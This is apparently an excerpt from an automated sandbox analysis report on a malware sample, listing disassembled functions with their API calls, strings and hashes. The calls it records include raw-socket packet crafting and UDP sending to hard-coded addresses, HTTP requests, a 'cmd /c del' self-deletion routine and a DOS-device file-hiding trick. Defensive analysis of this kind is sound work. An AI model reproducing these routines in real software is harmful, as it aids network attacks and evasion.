                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$Librarystrlen$FreeLoadmemset
                                                                    • String ID: H$Hackeroo$HttpOpenRequestA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetOpenA$InternetReadFile$a$c$e$k$o$o$r$wininet.dll
                                                                    • API String ID: 347128292-2978308426
                                                                    • Opcode ID: 986d9fcbbcf53a1930344b6e120e1ba53f474346e0fddfdd983dae15db621f11
                                                                    • Instruction ID: 55c1d738590813a071a3fe62bfda0b50337645362d61d571059f78ab30ed4b43
                                                                    • Opcode Fuzzy Hash: 986d9fcbbcf53a1930344b6e120e1ba53f474346e0fddfdd983dae15db621f11
                                                                    • Instruction Fuzzy Hash: 52D1A160C083DCDDEF12C7A8C8487DEBFB55F16748F0841D9D5886A292C7BA0A59CB76
                                                                    Function 10002182 Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 224networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WSASocketA.WS2_32(00000002,00000003,000000FF,00000000,00000000,00000001), ref: 100021DB
                                                                    • htons.WS2_32(00000000), ref: 10002205
                                                                    • htons.WS2_32(00000028), ref: 10002223
                                                                    • inet_addr.WS2_32(192.168.1.224), ref: 1000224F
                                                                    • htons.WS2_32(00000001), ref: 10002270
                                                                    • htons.WS2_32(00000000), ref: 1000227D
                                                                    • htonl.WS2_32(00000001), ref: 10002290
                                                                    • htons.WS2_32(00000200), ref: 100022A9
                                                                    • htons.WS2_32(00000014), ref: 100022CC
                                                                    • wsprintfA.USER32 ref: 10002318
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: htons$Sockethtonlinet_addrwsprintf
                                                                    • String ID: %d.%d.%d.%d$192.168.1.224$@$E$P
                                                                    • API String ID: 1107439114-1512540977
                                                                    • Opcode ID: 77073010b6d1fce684ebbab2ad13a75a87c72ec9c7d97d7c56b76adb04bea018
                                                                    • Instruction ID: 3aa4166313006357cc0d406c2f4b3f63d1f4c060f9359cf30c27f67dc127a10d
                                                                    • Opcode Fuzzy Hash: 77073010b6d1fce684ebbab2ad13a75a87c72ec9c7d97d7c56b76adb04bea018
                                                                    • Instruction Fuzzy Hash: 82815A75C4039CA9EB11DBE4CC49BEEBBBCEF09344F00415AE640BB192DAB45649CB66
                                                                    Function 0040A678 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 280networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WSASocketA.WS2_32(00000002,00000003,000000FF,00000000,00000000,00000001), ref: 0040A6D1
                                                                    • inet_addr.WS2_32(192.168.1.224), ref: 0040A745
                                                                    • htonl.WS2_32(00000001), ref: 0040A786
                                                                    • memcpy.MSVCRT(?,?,0000000C), ref: 0040A7D7
                                                                    • memcpy.MSVCRT(?,?,00000014,?,?,0000000C), ref: 0040A7E8
                                                                    • memcpy.MSVCRT(?,00000045,00000014,?,00000020,?,?,00000014,?,?,0000000C), ref: 0040A80B
                                                                    • memcpy.MSVCRT(?,?,00000014,?,00000045,00000014,?,00000020,?,?,00000014,?,?,0000000C), ref: 0040A81C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memcpy$Sockethtonlinet_addr
                                                                    • String ID: 192.168.1.224$@$E$P
                                                                    • API String ID: 3306927820-3350482742
                                                                    • Opcode ID: 5a0780becaf567cee12c16d5836d85fb3525f55cfcd2d93ef8ccf8fceffb88ba
                                                                    • Instruction ID: a9314fac676fd53dbf38f24c98caf17a979e5abf2df32fc7475d0e3468128e7a
                                                                    • Opcode Fuzzy Hash: 5a0780becaf567cee12c16d5836d85fb3525f55cfcd2d93ef8ccf8fceffb88ba
                                                                    • Instruction Fuzzy Hash: 12A11A71C1035CA9EB11EBE4CC85FEEBBBCAF09704F0411AAE204F7192D7B856558B66
                                                                    Function 00410758 Relevance: 43.9, APIs: 10, Strings: 15, Instructions: 159fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileFind_mbscmp$AttributesCloseDirectoryH_prologNextRemove_mbsicmp
                                                                    • String ID: A$F$F$F$KERNEL32.dll$d$e$i$i$i$l$n$r$s$t
                                                                    • API String ID: 357421281-2875861116
                                                                    • Opcode ID: c4b66df1202b12aac21a2b7e94fe434a2c6a7896f4ee17bbc87a2d124414de7b
                                                                    • Instruction ID: 06f2c94d14f0396f3e565ae6d6d6be8eb89252f200037f8b5ce93c3806638ce6
                                                                    • Opcode Fuzzy Hash: c4b66df1202b12aac21a2b7e94fe434a2c6a7896f4ee17bbc87a2d124414de7b
                                                                    • Instruction Fuzzy Hash: B151807180429DEEEF01EBE5CC48BEEBF74EF15314F04405AE114B21A1DBB98A84CB65
                                                                    Function 0040BC68 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 178networksleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WSAStartup.WS2_32(00000202,?), ref: 0040BC80
                                                                    • gethostname.WS2_32(?,00000104), ref: 0040BC97
                                                                    • gethostbyname.WS2_32(?), ref: 0040BCA4
                                                                    • memset.MSVCRT ref: 0040BCC7
                                                                    • inet_addr.WS2_32(10014E04), ref: 0040BD00
                                                                    • memset.MSVCRT ref: 0040BD43
                                                                    • memcpy.MSVCRT(?,?,00000004,?,00000000,0000043C), ref: 0040BD59
                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,00000000,0000043C), ref: 0040BD6B
                                                                    • memcpy.MSVCRT(?,00000011,00000001,?,?,00000004,?,?,00000004,?,00000000,0000043C), ref: 0040BD7D
                                                                    • memcpy.MSVCRT(?,?,00000002,?,00000011,00000001,?,?,00000004,?,?,00000004,?,00000000,0000043C), ref: 0040BD8F
                                                                    • memcpy.MSVCRT(?,?,00000008,?,?,00000002,?,00000011,00000001,?,?,00000004,?,?,00000004,?), ref: 0040BDA1
                                                                    • memcpy.MSVCRT(?,?,00000400), ref: 0040BDB8
                                                                    • memcpy.MSVCRT(?,00000045,00000014,?,00000414,?,?,00000400), ref: 0040BDDF
                                                                    • memcpy.MSVCRT(?,?,00000008,?,00000045,00000014,?,00000414,?,?,00000400), ref: 0040BDF1
                                                                    • memcpy.MSVCRT(?,?,00000400,?,?,00000008,?,00000045,00000014,?,00000414,?,?,00000400), ref: 0040BE05
                                                                    • WSASocketA.WS2_32(00000002,00000003,00000011,00000000,00000000,00000000), ref: 0040BE16
                                                                    • setsockopt.WS2_32(00000000,00000000,00000002,?,00000004), ref: 0040BE2F
                                                                    • inet_addr.WS2_32(10014E04), ref: 0040BE52
                                                                    • sendto.WS2_32(00000000,?,0000041C,00000000,00000002,00000010), ref: 0040BE72
                                                                    • Sleep.KERNEL32(0000000F), ref: 0040BE7D
                                                                    • closesocket.WS2_32(00000000), ref: 0040BE8D
                                                                    • WSACleanup.WS2_32 ref: 0040BE93
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memcpy$inet_addrmemset$CleanupSleepSocketStartupclosesocketgethostbynamegethostnamesendtosetsockopt
                                                                    • String ID: E
                                                                    • API String ID: 2767424432-3568589458
                                                                    • Opcode ID: 4b2431a2f927a7bb9c07503708122269beeda63dc347ae072476cbd1710014a4
                                                                    • Instruction ID: 2047285b8ba9929f1abb5f271b13bb79f499a251bf6189dbcae7618c3159e964
                                                                    • Opcode Fuzzy Hash: 4b2431a2f927a7bb9c07503708122269beeda63dc347ae072476cbd1710014a4
                                                                    • Instruction Fuzzy Hash: 3F61DBB195031CAAEB10DBE0CD89EDE77BCEF04744F0041A6F705E7191E7749A588B69
                                                                    Function 10005D3B Relevance: 40.4, APIs: 19, Strings: 4, Instructions: 113threadstringprocessCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10005D57
                                                                    • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 10005D74
                                                                    • GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104), ref: 10005D8F
                                                                    • lstrcpyA.KERNEL32(?, /c del ), ref: 10005DA9
                                                                    • lstrcatA.KERNEL32(?,?), ref: 10005DC3
                                                                    • lstrcatA.KERNEL32(?, > nul), ref: 10005DD1
                                                                    • lstrcatA.KERNEL32(?,?), ref: 10005DE1
                                                                    • GetCurrentProcess.KERNEL32(00000100), ref: 10005E0D
                                                                    • SetPriorityClass.KERNEL32(00000000), ref: 10005E1A
                                                                    • GetCurrentThread.KERNEL32 ref: 10005E1E
                                                                    • SetThreadPriority.KERNEL32(00000000), ref: 10005E2B
                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,0000000C,00000000,00000000,00000044,?), ref: 10005E44
                                                                    • SetPriorityClass.KERNEL32(?,00000040), ref: 10005E53
                                                                    • SetThreadPriority.KERNEL32(?,000000F1), ref: 10005E5A
                                                                    • ResumeThread.KERNEL32(?), ref: 10005E5F
                                                                    • GetCurrentProcess.KERNEL32(00000020), ref: 10005E6C
                                                                    • SetPriorityClass.KERNEL32(00000000), ref: 10005E73
                                                                    • GetCurrentThread.KERNEL32 ref: 10005E76
                                                                    • SetThreadPriority.KERNEL32(00000000), ref: 10005E7D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: PriorityThread$Current$ClassProcesslstrcat$Name$CreateEnvironmentFileModulePathResumeShortVariablelstrcpy
                                                                    • String ID: /c del $ > nul$COMSPEC$D
                                                                    • API String ID: 3725893594-850586679
                                                                    • Opcode ID: 6d6a3810a3ff98d1a818007ac0a4a6722265b29b39479b547dd4eb1410b57027
                                                                    • Instruction ID: ba411fa6bdf7f64fa30379c83865f067525f0869c798039ec0ba23a7a8a6f602
                                                                    • Opcode Fuzzy Hash: 6d6a3810a3ff98d1a818007ac0a4a6722265b29b39479b547dd4eb1410b57027
                                                                    • Instruction Fuzzy Hash: 4E31DAB290022CBFFB109BE0DC88EDB7BBCEB48391F104566F615E6194DB759A44CB61
                                                                    Function 00411ECA Relevance: 40.4, APIs: 8, Strings: 15, Instructions: 107threadwindowstringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetInputState.USER32 ref: 00411EE3
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00411EEE
                                                                    • PostThreadMessageA.USER32(00000000), ref: 00411EF5
                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00411F02
                                                                    • sprintf.MSVCRT ref: 00411F5C
                                                                    • lstrlen.KERNEL32(?), ref: 00411FB5
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411FF5
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00411FFC
                                                                      • Part of subcall function 0041209F: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 004120B8
                                                                      • Part of subcall function 0041209F: _beginthreadex.MSVCRT ref: 004120D6
                                                                      • Part of subcall function 0041209F: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004120E6
                                                                      • Part of subcall function 0041209F: CloseHandle.KERNEL32(?), ref: 004120EF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandleMessageObjectSingleThreadWait$CreateCurrentEventInputPostState_beginthreadexlstrlensprintf
                                                                    • String ID: %$C$G$Rsjshd fzfgkqcm$c$e$n$n$o$o$p$r$s$t$u
                                                                    • API String ID: 484184172-600094759
                                                                    • Opcode ID: 3ec30ea2cb6911e7687c0279ffeec8f5cb355a9439741ae30a149b9de0f7ca44
                                                                    • Instruction ID: f8c3a3a60109db68f9018fe92c162ea195ae6b72702514cab76667c72bc4cefc
                                                                    • Opcode Fuzzy Hash: 3ec30ea2cb6911e7687c0279ffeec8f5cb355a9439741ae30a149b9de0f7ca44
                                                                    • Instruction Fuzzy Hash: 083186A1C0429CBAFB0197B48C88FEF7E7C9F15288F0441A9F644A6196D7B94F488775
                                                                    Function 100093AC Relevance: 40.4, APIs: 14, Strings: 9, Instructions: 101sleepstringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 100093C5
                                                                    • ??2@YAPAXI@Z.MSVCRT(00100000), ref: 100093D1
                                                                    • wsprintfA.USER32 ref: 100093EC
                                                                    • ??2@YAPAXI@Z.MSVCRT(00100000), ref: 100093EF
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10009407
                                                                    • strrchr.MSVCRT ref: 10009416
                                                                    • wsprintfA.USER32 ref: 1000942D
                                                                    • DefineDosDeviceA.KERNEL32(00000001,?,?), ref: 1000945A
                                                                    • Sleep.KERNEL32(00000064), ref: 10009462
                                                                    • MoveFileExA.KERNEL32(?,\\.\killmdx,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 100094B0
                                                                    • SetFileAttributesA.KERNEL32(?,00000002), ref: 100094BF
                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 100094C9
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 100094D2
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 100094DA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$??2@??3@wsprintf$AttributesCreateDefineDeviceDirectoryFolderModuleMoveNamePathSleepSpecialstrrchr
                                                                    • String ID: \??\%s\%s$\\.\killmdx$d$i$k$l$l$m$x
                                                                    • API String ID: 2666178103-1535202459
                                                                    • Opcode ID: 49c5fb7fe1971c498a31ef3fc30b7af30c94aaf776dfd266b027c62efaa53d5b
                                                                    • Instruction ID: ec8a5a3b3f4b5005c648f4da811f148fbaa80bf784415522cf58aeb125771150
                                                                    • Opcode Fuzzy Hash: 49c5fb7fe1971c498a31ef3fc30b7af30c94aaf776dfd266b027c62efaa53d5b
                                                                    • Instruction Fuzzy Hash: 46419A31C0439CFEFB01D7E4CC89FDEBFB9AB06344F044099E245A6192C7BA5A598B61
                                                                    Function 0040B09C Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 223stringnetworksleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _mbscpymemsetstrlen$Sleepclosesocket$ExitThreadUserconnecthtonssendsocketsprintfstrncpywsprintf
                                                                    • String ID: http://
                                                                    • API String ID: 2248495583-1121587658
                                                                    • Opcode ID: 1fa7bb76086c9d62cbf7959ab111ec4a04d5eb30678cdbd2d996a5bc2ea49437
                                                                    • Instruction ID: d465bee2d41e8efb3392e8709a26bebf5d1ad12d85fbbbe2977b2571eff9cc19
                                                                    • Opcode Fuzzy Hash: 1fa7bb76086c9d62cbf7959ab111ec4a04d5eb30678cdbd2d996a5bc2ea49437
                                                                    • Instruction Fuzzy Hash: 7581A57291026CAAEB11DBA4CC89FDE7BB8FF09310F1440A6E604F6190D7789B54CBA5
                                                                    Function 100042B5 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 152networkstringthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$sprintfstrlen$CountExitStartupThreadTickclosesocketconnecthtonsinet_addrmallocrandrecvsendsocket
                                                                    • String ID: #0%s!$%s/%s
                                                                    • API String ID: 1225622339-1627496495
                                                                    • Opcode ID: c9efba1d756048f844a196d80d953edabda74aa17811aa5757aed1c508d76105
                                                                    • Instruction ID: cd607ab1cd02ee6cc35d433b2eab6e523d31a1c03ef89bd83127d2f7d4ddc0bc
                                                                    • Opcode Fuzzy Hash: c9efba1d756048f844a196d80d953edabda74aa17811aa5757aed1c508d76105
                                                                    • Instruction Fuzzy Hash: 3A513EB180025CAFFB00DBA0DD85EEEBBBCEF05384F014165F505A7295DB349E448B65
                                                                    Function 0040AA83 Relevance: 35.2, APIs: 5, Strings: 15, Instructions: 249stringlibraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
